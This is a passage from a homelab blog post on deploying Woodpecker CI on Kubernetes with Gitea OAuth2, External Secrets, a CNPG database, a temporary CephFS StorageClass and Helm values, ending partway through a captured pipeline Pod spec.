</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>This SecretStore then allows me to use External Secret&rsquo;s ExternalSecret
templating to take the CNPG Secret created automatically and bring it into a
format to make it usable with the Woodpecker Helm chart. I decided that I would
use the <code>envFrom.secretRef</code> method to turn all of the Secret&rsquo;s keys into env
variables:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-db-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_DATABASE_DATASOURCE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">uri</span>
</span></span></code></pre></div><p>That ExternalSecret takes the <code>uri</code> key from the automatically created CNPG
Secret and writes its content into a new Secret&rsquo;s <code>WOODPECKER_DATABASE_DATASOURCE</code>
key.
And just like that, I have a Secret in the right format to use it with
Woodpecker&rsquo;s Helm chart.</p>
<p>After I implemented the above, I had another thought how I could do the same
thing without taking the detour via ExternalSecret. The Helm chart does provide
options to add extra volume mounts. Furthermore, Woodpecker has the
<code>WOODPECKER_DATABASE_DATASOURCE_FILE</code> variable, which allows reading the
connection string from a file. So I could have mounted the CNPG DB Secret as a
volume and then provided the path to the file with the <code>uri</code> key in this
variable. Sadly I found this a bit late, but I will keep this possibility in
mind should I come across another Helm chart which lacks the possibility
to assign arbitrary Secret keys to env variables.</p>
<h2 id="temporary-storageclass">Temporary StorageClass</h2>
<p>Woodpecker needs some storage for every pipeline executed. That storage is
shared between all steps and is used to clone the repository and share
intermediate artifacts between steps.</p>
<p>With the Kubernetes backend, Woodpecker uses PersistentVolumeClaims, one per
pipeline run. It also automatically cleans those up after the pipeline has run
through.
The issue for me is that in my Rook Ceph setup, the StorageClasses all have their
reclaim policy set to <code>Retain</code>. This is mostly because I&rsquo;m not the smartest guy
under the sun, and there&rsquo;s a real chance that I might accidentally remove a
PVC with data I would really like to keep.
But that&rsquo;s a problem for these temporary PVCs, which are only relevant for the
duration of a single pipeline run. Using my standard StorageClasses would mean
ending up with a lot of unused PersistentVolumes.</p>
<p>So I had to create another StorageClass with the reclaim policy set to <code>Delete</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">storage.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">StorageClass</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-fs-temp</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">provisioner</span>: <span style="color:#ae81ff">rook-ceph.cephfs.csi.ceph.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterID</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">fsName</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pool</span>: <span style="color:#ae81ff">homelab-fs-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-provisioner</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-cephfs-node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>This uses CephFS as the provider, because I like those volumes to be RWX capable,
which is not the case for RBD based volumes.</p>
<p>Using this StorageClass, the PersistentVolume is deleted when the PVC is
deleted, freeing the space for the next pipeline run.</p>
<h2 id="gitea-configuration">Gitea configuration</h2>
<p>Because Woodpecker needs access to Gitea, there&rsquo;s some configuration
necessary as well, mainly related to the fact that Woodpecker doesn&rsquo;t have its
own authentication and instead relies on the forge it&rsquo;s connected to.</p>
<p>To begin with, Woodpecker needs to be added as an OAuth2 application. This can
be done by any user, under the <code>https://gitea.example.com/user/settings/applications</code>
URL. The configuration is the same as for any other OAuth2 provider, Woodpecker
needs a client ID and a client secret.</p>
<p>The application can be given any name, and the redirect URL has to be
<code>https://&lt;your-woodpecker-url&gt;/authorize</code>:</p>
<figure>
    <img loading="lazy" src="gitea_add_app.png"
         alt="A screenshot of Gitea&#39;s OAuth2 client app creation form. In the &#39;Application Name&#39; field, it shows &#39;Woodpecker Blog Example&#39;, and in the &#39;Redirect URIs&#39; field, it shows &#39;https://ci.example.com/authorize&#39;. The &#39;Confidential Client&#39; option is enabled."/> <figcaption>
            <p>Gitea&rsquo;s OAuth2 creation form.</p>
        </figcaption>
</figure>

<p>After clicking <em>Create Application</em>, Gitea creates the app and shows the
necessary information:</p>
<figure>
    <img loading="lazy" src="gitea_add_info.png"
         alt="A screenshot of Gitea&#39;s OAuth2 app information screen. It shows the randomly generated &#39;Client ID&#39; and &#39;Client Secret&#39; and allows changing the &#39;Application Name&#39; and &#39;Redirect URIs&#39; fields."/> <figcaption>
            <p>Gitea&rsquo;s OAuth2 information page.</p>
        </figcaption>
</figure>

<p>I then copied the <em>Client ID</em> and <em>Client Secret</em> fields into my Vault instance
and provided them to Kubernetes with another ExternalSecret:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hashi-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_GITEA_CLIENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/gitea-oauth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">clientid</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">WOODPECKER_GITEA_SECRET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/gitea-oauth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">clientSecret</span>
</span></span></code></pre></div><p>That was all the Gitea config necessary. There&rsquo;s going to be one more step
when accessing Woodpecker for the first time. Because it uses OAuth2, it will
redirect you to Gitea to log in, and Gitea will then need confirmation that
Woodpecker can access your account info and repositories.</p>
<h2 id="deploying-woodpecker">Deploying Woodpecker</h2>
<p>For deploying Woodpecker itself, I&rsquo;m using the <a href="https://github.com/woodpecker-ci/helm">official Helm chart</a>.
It&rsquo;s split into two subcharts, one for the agents which run the pipelines and
one for the server. Let&rsquo;s start with the server part of the <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_OPEN</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_HOST</span>: <span style="color:#e6db74">&#39;https://ci.example.com&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_DISABLE_USER_AGENT_REGISTRATION</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_DATABASE_DRIVER</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_GITEA</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_GITEA_URL</span>: <span style="color:#e6db74">&#34;https://gitea.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_PLUGINS_PRIVILEGED</span>: <span style="color:#e6db74">&#34;woodpeckerci/plugin-docker-buildx:latest-insecure&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretNamesForEnvFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">gitea-secret</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">woodpecker-db-secret</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistentVolume</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">ci.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span></code></pre></div><p>As I do so often, I explicitly set <code>metrics.enabled</code> to <code>false</code>, so that later
I can go through my Homelab repo and slowly enable metrics for the apps I&rsquo;m
interested in, just by grepping for <code>metrics</code>.</p>
<p>Woodpecker is entirely configured through environment variables. I&rsquo;ve configured
those which don&rsquo;t contain secrets right in the <code>values.yaml</code>, and the secrets
are added via the <code>extraSecretNamesForEnvFrom</code> list. Those are the Gitea OAuth2
and CNPG DB Secrets. The server itself also needs some storage space, which I
put on my bulk storage pool with the <code>persistentVolume</code> option. I&rsquo;m also
configuring the Ingress and resources.</p>
<p>A short comment on the resources: Make sure that you know what you&rsquo;re doing. &#x1f605;
I initially had the <code>cpu: 100m</code> resource set under <code>limits</code> accidentally. And
then I was wondering yesterday why the Woodpecker server was restarted so often
due to failed liveness probes. Turns out that the <code>100m</code> is not enough CPU
when the Pod happens to run on a Pi 4 and I&rsquo;m also clicking around in the Web UI.
The liveness probe then doesn&rsquo;t get a timely answer and starts failing, ultimately
restarting the Pod.</p>
<p>The second part of a Woodpecker deployment are the agents. Those are the part
of Woodpecker that runs the actual pipelines, launching the containers for each
step. Woodpecker supports multiple backends. The first one is the traditional
Docker backend, which needs the agent to have access to the Docker socket.
That&rsquo;s the config I&rsquo;ve been running up to now with my Drone setup.
The two biggest downsides for me were the fact that a piece of software explicitly
intended to execute arbitrary code would have full access to the host&rsquo;s Docker
daemon.
The second one was that the agent could only run pipelines on its own host, which
meant that it couldn&rsquo;t distribute the different steps in my entire Nomad cluster.</p>
<p>Now, with Woodpecker, I&rsquo;m making use of the <a href="https://woodpecker-ci.org/docs/administration/backends/kubernetes">Kubernetes Backend</a>.
With this backend, the agents themselves only work as an interface to the
k8s API, launching one Pod for each step and creating the PVC used as shared
storage for all steps of a pipeline.</p>
<p>One quirk of the Kubernetes backend is that it adds a NodeSelector to the
architecture of the agent which is launching the pipeline. So when the agent
executing a pipeline happens to be an ARM64 machine, all Pods for that pipeline
will also run on ARM64 machines. But this can be controlled for individual
steps as well.</p>
<p>Here is the agent portion of the Woodpecker Helm <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">agent</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_MAX_WORKFLOWS</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_NAMESPACE</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_VOLUME_SIZE</span>: <span style="color:#ae81ff">10G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_STORAGE_CLASS</span>: <span style="color:#ae81ff">homelab-fs-temp</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_BACKEND_K8S_STORAGE_RWX</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">rbasc</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">create</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">128Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">topologySpreadConstraints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">maxSkew</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">topologyKey</span>: <span style="color:#e6db74">&#34;kubernetes.io/arch&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">whenUnsatisfiable</span>: <span style="color:#e6db74">&#34;DoNotSchedule&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labelSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">&#34;app.kubernetes.io/name&#34;: </span><span style="color:#ae81ff">agent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">&#34;app.kubernetes.io/instance&#34;: </span><span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>Here I&rsquo;m configuring two agents to be run, and one each on a different
architecture. In my cluster, this leads to one agent running on AMD64 and one
running on ARM64, through the <code>topologySpreadConstraints</code>. I&rsquo;m also telling
the agents which StorageClass to use, as I explained above I had to create
a new one with retention disabled. I&rsquo;m setting a default 10 GB size for the
volume.</p>
<p>Before continuing with some CI pipeline configs, let&rsquo;s have a short look at
the Pods Woodpecker launches. I&rsquo;ve captured the Pod for the following Woodpecker
CI step:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;binary-data-123&#34; &gt; executable</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">chmod u+x ./executable</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">sleep 120</span>
</span></span></code></pre></div><p>It looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">step</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjg6be5cq</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo $CI_SCRIPT | base64 -d | /bin/sh -e</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR_AVATAR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/avatars/d941e68cc8aa38efdee91c3e3c97159e</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_AUTHOR_EMAIL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier@noreply.gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_MESSAGE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Add a sleep to inspect the Pod</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_REF</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">refs/heads/master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_SHA</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_COMMIT_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_FORGE_TYPE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_MACHINE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker-agent-1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_CREATED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888948&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_EVENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FILES</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#39;[&#34;.woodpecker/my-first-workflow.yaml&#34;]&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888960&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;3&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_PARENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
